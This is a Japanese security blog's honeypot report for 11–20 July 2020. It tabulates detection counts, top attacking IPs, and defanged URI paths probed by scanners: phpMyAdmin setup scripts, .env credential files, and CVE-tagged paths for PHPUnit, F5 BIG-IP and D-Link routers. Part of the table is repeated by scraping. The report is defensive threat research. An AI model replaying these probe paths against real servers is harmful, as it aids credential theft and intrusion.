/phpmyadmin4/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin5/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin6/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin7/scripts/setup[.]php	phpMyAdmin	-	1 件
/phppgadmin/scripts/setup[.]php	Administrator	-	1 件
/phppma/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2006/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2007/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2008/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2009/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2010/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2011/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2012/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2013/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2014/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2015/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2016/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2017/scripts/setup[.]php	phpMyAdmin	-	1 件
/program/scripts/setup[.]php	PHPMyAdmin	-	1 件
/shopdb/scripts/setup[.]php	-	-	1 件
/sql/myadmin/scripts/setup[.]php	-	-	1 件
/sql/php-myadmin/scripts/setup[.]php	-	-	1 件
/sql/phpMyAdmin/scripts/setup[.]php	-	-	1 件
/sql/phpMyAdmin2/scripts/setup[.]php	-	-	1 件
/sql/phpmanager/scripts/setup[.]php	-	-	1 件
/sql/phpmy-admin/scripts/setup[.]php	-	-	1 件
/sql/sql-admin/scripts/setup[.]php	-	-	1 件
/sql/sql/scripts/setup[.]php	-	-	1 件
/sql/sqladmin/scripts/setup[.]php	-	-	1 件
/sql/sqlweb/scripts/setup[.]php	-	-	1 件
/sql/webadmin/scripts/setup[.]php	-	-	1 件
/sql/webdb/scripts/setup[.]php	-	-	1 件
/sql/websql/scripts/setup[.]php	-	-	1 件
/sqlmanager/scripts/setup[.]php	-	-	1 件
/sqlweb/scripts/setup[.]php	-	-	1 件
/web/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/web/scripts/setup[.]php	web page	-	1 件
/webadmin/scripts/setup[.]php	Administrator	-	1 件
/webdb/scripts/setup[.]php	Database	-	1 件
/websql/scripts/setup[.]php	SQL	-	1 件
/xampp/phpmyadmin/scripts/setup[.]php	Unknown	-	1 件
/~/phpmanager/scripts/setup[.]php	phpMyAdmin	-	1 件
/PHPMYADMIN/scripts/setup[.]php	phpMyAdmin	-	1 件
/pHpMyAdMiN/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin/scripts/db[.]init[.]php	phpMyAdmin	-	1 件
/phpMyAdmin/scripts/db[.]init[.]php	phpMyAdmin	-	1 件
/phpAdmin/scripts/setup[.]php	Administrator	-	1 件
/tmpfs/auto[.]jpg	-	-	1 件
/wp-content/plugins/angwp/package[.]json	WordPress	-	1 件
/manager/text/list	Apache Tomcat Manager	-	1 件
/stalker_portal/c/version[.]js	-	-	1 件
/client_area/	Unknown	Unknown	1 件
/system_api[.]php	-	-	1 件
/stalker_portal/c/	-	-	1 件
/api[.]php	api	-	1 件
/login[.]php	Login Page	-	1 件
/streaming	-	-	1 件
/streaming/er678pkf[.]php	-	-	1 件
/cdn-cgi/trace	Cloudflare	-	1 件
///	-	-	1 件
///wp-json/wp/v2/users/	-	-	1 件
/HNAP1/	D-Link Router	CVE-2017-3193	1 件
hxxp://112[.]35[.]88[.]28:8088/index[.]p hp	-	-	1 件
/nmaplowercheck1594687755	Nmap	-	1 件
/NmapUpperCheck1594687755	Nmap	-	1 件
/Nmap/folder/check1594687755	Nmap	-	1 件
/HNAP1	D-Link Router	CVE-2017-3193	1 件
/evox/about	Nmap	-	1 件
/ctrlt/DeviceUpgrade_1	Huawei Home Device	-	1 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd	-	-	1 件
/TP/public/index[.]php	-	-	1 件
/nmaplowercheck1594884888	Nmap	-	1 件
/NmapUpperCheck1594884888	Nmap	-	1 件
/solr/	-	-	1 件
/ReportServer	SQL Server Reporting Services	CVE-2020-0618	1 件
/adv,/cgi-bin/weblogin[.]cgi	Zyxel NAS	CVE-2020-9054	1 件
'/xui/common/images/bg_status[.]php'	F5 Networks BIG-IP	CVE-2020-5902	1 件
/nice ports,/Trinity[.]txt[.]bak	-	-	1 件
md5calc[.]com:443	Unauthorized Relay	-	1 件
ifconfig[.]me:443	Unauthorized Relay	-	1 件
www[.]showmyip[.]com:443	Unauthorized Relay	-	1 件
/wordpress	WordPress	-	1 件
/wordpress/wp-json/wp/v2/users	WordPress	-	1 件
/wordpress/	WordPress	-	1 件
/user/UserLogin	WP Marketplace 2.4.0	CVE-2014-9013 CVE-2014-9014	1 件
chekfast[.]zennolab[.]com:443	Unauthorized Relay	-	1 件
hxxps://chek[.]zennolab[.]com/proxy[.]ph p	Unauthorized Relay	-	1 件
v4[.]ipv6-test[.]com:443	Unauthorized Relay	-	1 件
hxxp://112[.]35[.]63[.]31:8088/index[.]p hp	-	-	1 件

WOWHoneypot(HTTPS)(Total)

Number of detections

Date	Detections
20200711	21
20200712	7
20200713	18
20200714	8
20200715	15
20200716	17
20200717	21
20200718	19
20200719	25
20200720	17

RemoteIP(TOP20)

IP	Country	Count	AbuseIPDB
31[.]193[.]21[.]39	Italy	2001 件	Link
185[.]128[.]41[.]50	Switzerland	514 件	Link
185[.]216[.]140[.]239	Netherlands	172 件	Link
195[.]54[.]160[.]21	Russia	44 件	Link
107[.]167[.]7[.]226	United States	42 件	Link
103[.]75[.]189[.]81	Malaysia	20 件	Link
195[.]54[.]160[.]135	Russia	19 件	Link
143[.]92[.]32[.]86	Cambodia	16 件	Link
80[.]82[.]70[.]140	Seychelles	12 件	Link
143[.]92[.]32[.]106	Cambodia	12 件	Link
35[.]200[.]47[.]165	Unknown	12 件	Link
93[.]174[.]93[.]139	Netherlands	11 件	Link
167[.]99[.]164[.]22	United States	11 件	Link
45[.]199[.]113[.]16	United States	10 件	Link
185[.]100[.]87[.]248	Romania	10 件	Link
65[.]74[.]177[.]84	United States	9 件	Link
93[.]113[.]111[.]100	United Kingdom	9 件	Link
62[.]210[.]185[.]4	France	9 件	Link
46[.]101[.]31[.]59	United Kingdom	9 件	Link
104[.]199[.]101[.]230	United States	9 件	Link

URI PATH

URI Path	Target	CVE	Count
/manager/html	Apache Tomcat Manager	-	2516 件
/wp-login[.]php	WordPress	-	588 件
/	-	-	420 件
/xmlrpc[.]php	Wordpress	-	294 件
github[.]com:443	Unauthorized Relay	-	30 件
/phpMyAdmin/scripts/setup[.]php	phpMyAdmin	-	24 件
hxxpbin[.]org:443	Unauthorized Relay	-	14 件
/solr/admin/info/system	-	-	11 件
/index[.]php	-	-	11 件
/vendor/phpunit/phpunit/src/Util/PHP/eva l-stdin[.]php	PHPUnit	CVE-2017-9841	10 件
/hudson	Unknown	-	9 件
/api/jsonws/invoke	api	-	9 件
/cgi-bin/mainfunction[.]cgi	CGI	-	8 件
/[.]env	Hidden files	-	8 件
/portal/redlion	Unknown	Unknown	8 件
/config/getuser	-	-	8 件
sm[.]bdimg[.]com:443	Unauthorized Relay	-	7 件
/boaform/admin/formLogin	Administrator	-	6 件
g[.]alicdn[.]com:443	Unauthorized Relay	-	6 件
/favicon[.]ico	favicon	-	5 件
/admin/login[.]asp	Administrator	-	3 件
/webfig/	MikroTik RouterOS	-	3 件
/phpmyadmin/	phpMyAdmin	-	3 件
/myadmin/scripts/setup[.]php	Administrator	-	3 件
/phpmy/scripts/setup[.]php	phpMyAdmin	-	3 件
/pma/scripts/setup[.]php	phpMyAdmin	-	3 件
/shell	-	-	3 件
/robots[.]txt	robots.txt	-	3 件
/cgi-bin/kerbynet	CGI	-	3 件
/ipc$	shared folder	-	2 件
/database/scripts/setup[.]php	Database	-	2 件
/db/scripts/setup[.]php	Database	-	2 件
/dbadmin/scripts/setup[.]php	Administrator	-	2 件
/my/scripts/setup[.]php	PHPMyAdmin	-	2 件
/mysql/scripts/setup[.]php	MySQL	-	2 件
/mysqladmin/scripts/setup[.]php	MySQL	-	2 件
/phpMyAdmin-2/scripts/setup[.]php	phpMyAdmin	-	2 件
/phpadmin/scripts/setup[.]php	Administrator	-	2 件
/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	2 件
/phpmyadmin1/scripts/setup[.]php	phpMyAdmin	-	2 件
/phpmyadmin2/scripts/setup[.]php	phpMyAdmin	-	2 件
/scripts/setup[.]php	-	-	2 件
/sqladm/scripts/setup[.]php	-	-	2 件
/sqladmin/scripts/setup[.]php	-	-	2 件
/MyAdmin/scripts/setup[.]php	Administrator	-	2 件
hxxp://example[.]com/	Unauthorized relay	-	2 件
/streaming/clients_live[.]php	-	-	2 件
/sdk	-	-	2 件
/[.]remote	Hidden files	-	2 件
/[.]local	Hidden files	-	2 件
/[.]production	Hidden files	-	2 件
//vendor/[.]env	-	-	2 件
//lib/[.]env	-	-	2 件
//lab/[.]env	-	-	2 件
//cronlab/[.]env	-	-	2 件
//cron/[.]env	-	-	2 件
//core/[.]env	-	-	2 件
//core/app/[.]env	-	-	2 件
//core/Datavase/[.]env	-	-	2 件
//database/[.]env	-	-	2 件
//config/[.]env	-	-	2 件
//assets/[.]env	-	-	2 件
//app/[.]env	-	-	2 件
//apps/[.]env	-	-	2 件
//uploads/[.]env	-	-	2 件
//sitemaps/[.]env	-	-	2 件
//saas/[.]env	-	-	2 件
/wp-content/plugins/t_file_wp/t_file_wp[ .]php	WordPress	-	2 件
/wordpress/wp-login[.]php	WordPress	-	2 件
5[.]132[.]162[.]27:443	Unauthorized Relay	-	2 件
hxxp://163[.]172[.]88[.]110:41298/pass	Unauthorized relay	-	2 件
/sitemap[.]xml	-	-	2 件
/[.]well-known/security[.]txt	Hidden files	-	2 件
/boaform/admin/formPing	Administrator	-	1 件
ext[.]baidu[.]com:443	Unauthorized Relay	-	1 件
hxxp://112[.]124[.]42[.]80:63435/	Unauthorized relay	-	1 件
/w00tw00t[.]at[.]blackhats[.]romanian[.] anti-sec:)	ZmEu	-	1 件
/2phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2011/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2012/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2013/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2015/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2016/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2018/scripts/setup[.]php	phpMyAdmin	-	1 件
/SQL/scripts/setup[.]php	-	-	1 件
/_PHPMYADMIN/scripts/setup[.]php	phpMyAdmin	-	1 件
/admin/db/scripts/setup[.]php	Administrator	-	1 件
/admin/mysql/scripts/setup[.]php	MySQL	-	1 件
/admin/pMA/scripts/setup[.]php	phpMyAdmin	-	1 件
/admin/phpMyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/admin/scripts/setup[.]php	Administrator	-	1 件
/admin/setup[.]php	Administrator	-	1 件
/admin/sql/scripts/setup[.]php	SQL	-	1 件
/admin/sqladmin/scripts/setup[.]php	SQLAdmin	-	1 件
/admin/sysadmin/scripts/setup[.]php	Administrator	-	1 件
/admin/web/scripts/setup[.]php	Administrator	-	1 件
/administrator1/admin/scripts/setup[.]ph p	Administrator	-	1 件
/administrator1/db/scripts/setup[.]php	Administrator	-	1 件
/administrator1/pma/scripts/setup[.]php	phpMyAdmin	-	1 件
/administrator1/web/scripts/setup[.]php	Administrator	-	1 件
/administrator/admin/scripts/setup[.]php	Administrator	-	1 件
/administrator/db/scripts/setup[.]php	Administrator	-	1 件
/administrator/pma/scripts/setup[.]php	phpMyAdmin	-	1 件
/administrator/web/scripts/setup[.]php	Administrator	-	1 件
/blog/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/cpadmin/scripts/setup[.]php	Administrator	-	1 件
/cpadmindb/scripts/setup[.]php	Administrator	-	1 件
/cpanelmysql/scripts/setup[.]php	MySQL	-	1 件
/cpanelphpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/db/db-admin/scripts/setup[.]php	Administrator	-	1 件
/db/dbadmin/scripts/setup[.]php	Administrator	-	1 件
/db/dbweb/scripts/setup[.]php	Database	-	1 件
/db/myadmin/scripts/setup[.]php	Administrator	-	1 件
/db/phpMyAdmin-3/scripts/setup[.]php	phpMyAdmin	-	1 件
/db/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/db/phpmyadmin3/scripts/setup[.]php	phpMyAdmin	-	1 件
/db/webadmin/scripts/setup[.]php	Administrator	-	1 件
/db/webdb/scripts/setup[.]php	Database	-	1 件
/db/websql/scripts/setup[.]php	SQL	-	1 件
/mysql-admin/scripts/setup[.]php	MySQL	-	1 件
/mysql/admin/scripts/setup[.]php	MySQL	-	1 件
/mysql/db/scripts/setup[.]php	MySQL	-	1 件
/mysql/mysqlmanager/scripts/setup[.]php	MySQL	-	1 件
/mysql/pMA/scripts/setup[.]php	phpMyAdmin	-	1 件
/mysql/sqlmanager/scripts/setup[.]php	MySQL	-	1 件
/mysql/web/scripts/setup[.]php	MySQL	-	1 件
/mysqlmanager/scripts/setup[.]php	MySQL	-	1 件
/p/m/a/scripts/setup[.]php	phpMyAdmin	-	1 件
/php-my-admin/scripts/setup[.]php	phpMyAdmin	-	1 件
/php-myadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/php/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpLDAPadmin/scripts/setup[.]php	Administrator	-	1 件
/phpMyAdmi/scripts/setup[.]php	phpMyAdmin	-	1 件
/hpMyAdmin/scripts/setup[.]php	Administrator	-	1 件
/phpMyAdmin-2009-1/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2009-3/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2009-2/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-3[.]1[.]3[.]1/scripts/setup[ .]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]11[.]9[.]5/scripts/setup [.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]10[.]0[.]0/scripts/setup [.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]10[.]0/scripts/setup[.]p hp	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]11[.]1-all-languages/scr ipts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]11[.]11[.]3/scripts/setu p[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]11[.]11/scripts/setup[.] php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]5[.]5/scripts/setup[.]ph p	phpMyAdmin	-	1 件
/phpMyAdmin-3[.]0[.]0[.]0-all-languages/ scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-3/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAds/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmanager/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmy-admin/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2011/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2012/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2013/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2014/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2015/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2017/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2018/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin3/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin4/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin5/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin6/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin7/scripts/setup[.]php	phpMyAdmin	-	1 件
/phppgadmin/scripts/setup[.]php	Administrator	-	1 件
/phppma/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2006/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2007/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2008/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2009/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2010/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2011/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2012/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2013/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2014/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2015/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2016/scripts/setup[.]php	phpMyAdmin	-	1 件
/pma2017/scripts/setup[.]php	phpMyAdmin	-	1 件
/program/scripts/setup[.]php	PHPMyAdmin	-	1 件
/shopdb/scripts/setup[.]php	-	-	1 件
/sql/myadmin/scripts/setup[.]php	-	-	1 件
/sql/php-myadmin/scripts/setup[.]php	-	-	1 件
/sql/phpMyAdmin/scripts/setup[.]php	-	-	1 件
/sql/phpMyAdmin2/scripts/setup[.]php	-	-	1 件
/sql/phpmanager/scripts/setup[.]php	-	-	1 件
/sql/phpmy-admin/scripts/setup[.]php	-	-	1 件
/sql/sql-admin/scripts/setup[.]php	-	-	1 件
/sql/sql/scripts/setup[.]php	-	-	1 件
/sql/sqladmin/scripts/setup[.]php	-	-	1 件
/sql/sqlweb/scripts/setup[.]php	-	-	1 件
/sql/webadmin/scripts/setup[.]php	-	-	1 件
/sql/webdb/scripts/setup[.]php	-	-	1 件
/sql/websql/scripts/setup[.]php	-	-	1 件
/sqlmanager/scripts/setup[.]php	-	-	1 件
/sqlweb/scripts/setup[.]php	-	-	1 件
/web/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/web/scripts/setup[.]php	web page	-	1 件
/webadmin/scripts/setup[.]php	Administrator	-	1 件
/webdb/scripts/setup[.]php	Database	-	1 件
/websql/scripts/setup[.]php	SQL	-	1 件
/xampp/phpmyadmin/scripts/setup[.]php	Unknown	-	1 件
/~/phpmanager/scripts/setup[.]php	phpMyAdmin	-	1 件
/PHPMYADMIN/scripts/setup[.]php	phpMyAdmin	-	1 件
/pHpMyAdMiN/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin/scripts/db[.]init[.]php	phpMyAdmin	-	1 件
/phpMyAdmin/scripts/db[.]init[.]php	phpMyAdmin	-	1 件
/phpAdmin/scripts/setup[.]php	Administrator	-	1 件
/tmpfs/auto[.]jpg	-	-	1 件
/wp-content/plugins/angwp/package[.]json	WordPress	-	1 件
/manager/text/list	Apache Tomcat Manager	-	1 件
/stalker_portal/c/version[.]js	-	-	1 件
/client_area/	Unknown	Unknown	1 件
/system_api[.]php	-	-	1 件
/stalker_portal/c/	-	-	1 件
/api[.]php	api	-	1 件
/login[.]php	Login Page	-	1 件
/streaming	-	-	1 件
/streaming/er678pkf[.]php	-	-	1 件
/cdn-cgi/trace	Cloudflare	-	1 件
///	-	-	1 件
///wp-json/wp/v2/users/	-	-	1 件
/HNAP1/	D-Link Router	CVE-2017-3193	1 件
hxxp://112[.]35[.]88[.]28:8088/index[.]p hp	-	-	1 件
/nmaplowercheck1594687755	Nmap	-	1 件
/NmapUpperCheck1594687755	Nmap	-	1 件
/Nmap/folder/check1594687755	Nmap	-	1 件
/HNAP1	D-Link Router	CVE-2017-3193	1 件
/evox/about	Nmap	-	1 件
/ctrlt/DeviceUpgrade_1	Huawei Home Device	-	1 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd	-	-	1 件
/TP/public/index[.]php	-	-	1 件
/nmaplowercheck1594884888	Nmap	-	1 件
/NmapUpperCheck1594884888	Nmap	-	1 件
/solr/	-	-	1 件
/ReportServer	SQL Server Reporting Services	CVE-2020-0618	1 件
/adv,/cgi-bin/weblogin[.]cgi	Zyxel NAS	CVE-2020-9054	1 件
'/xui/common/images/bg_status[.]php'	F5 Networks BIG-IP	CVE-2020-5902	1 件
/nice ports,/Trinity[.]txt[.]bak	-	-	1 件
md5calc[.]com:443	Unauthorized Relay	-	1 件
ifconfig[.]me:443	Unauthorized Relay	-	1 件
www[.]showmyip[.]com:443	Unauthorized Relay	-	1 件
/wordpress	WordPress	-	1 件
/wordpress/wp-json/wp/v2/users	WordPress	-	1 件
/wordpress/	WordPress	-	1 件
/user/UserLogin	WP Marketplace 2.4.0	CVE-2014-9013 CVE-2014-9014	1 件
chekfast[.]zennolab[.]com:443	Unauthorized Relay	-	1 件
hxxps://chek[.]zennolab[.]com/proxy[.]ph p	Unauthorized Relay	-	1 件
v4[.]ipv6-test[.]com:443	Unauthorized Relay	-	1 件
hxxp://112[.]35[.]63[.]31:8088/index[.]p hp	-	-	1 件

sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(2020/7/11-7/20)

Honeytrap(Total)

Number of detections

RemoteIP(TOP20)

Port(TOP20)

URI PATH

Malware

WOWHoneypot(Total)

Number of detections

RemoteIP(TOP20)

URI PATH

WOWHoneypot(HTTPS)(Total)

Number of detections

RemoteIP(TOP20)

URI PATH